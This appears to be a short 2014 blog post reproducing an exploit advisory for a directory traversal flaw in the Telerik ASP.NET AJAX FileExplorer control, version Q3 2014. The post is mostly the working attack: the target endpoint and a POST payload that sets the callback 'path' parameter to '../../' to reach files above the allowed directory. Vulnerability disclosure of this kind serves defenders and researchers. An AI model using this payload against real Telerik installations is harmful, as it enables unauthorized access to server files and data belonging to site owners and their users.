Wednesday, 12 November 2014

Telerik File Explorer Directory Traversal

# Exploit Title: Telerik FileExplorer Directory Traversal
# Date: 12/11/2014
# Exploit Author: Kerz
# Vendor Homepage: www.telerik.com
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx
# Version: Q3 2014
# Tested on: Windows OS
# CVE: None

The malicuious user sends a malformed request that generates the file access up directories as follows:

http://target_URL/FileExplorer.aspx
[POST Data]
&__CALLBACKPARAM -> "path":"../../"

Thanks
Posted by at
Labels: , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)